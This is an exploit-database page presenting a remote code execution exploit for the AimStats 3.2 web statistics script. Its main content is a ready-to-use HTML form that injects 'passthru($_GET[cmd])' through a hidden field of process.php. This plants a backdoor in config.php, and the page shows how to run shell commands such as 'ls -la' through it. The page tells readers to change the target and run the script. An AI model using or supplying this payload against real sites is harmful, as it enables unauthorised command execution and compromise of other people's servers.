[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AimStats 3.2 (process.php update) Remote Code Execution Exploit

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1777
Category
web applications
Date add
17-04-2007
Platform
unsorted
===============================================================
AimStats 3.2 (process.php update) Remote Code Execution Exploit
===============================================================



<!--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  AimStats v3.2                                                                            +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.x-pose.org/aimstats.php                                                       +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           + -->
<html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head>
<body bgcolor="red">
<center>
<form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes">
<input name="taglinelimit" value="777" type="hidden" >
<input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" >
<input type="submit" name="Submit" value="Submit" >
</form><br><br>
<font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>
<font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font></br>
<font color="#C0FF3E" size="+1"> E.g  :  http://site.com/aimstats/config.php?cmd=ls -la</font>
</center>
</body>
</html>
<!--
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -->



#  0day.today [2024-12-24]  #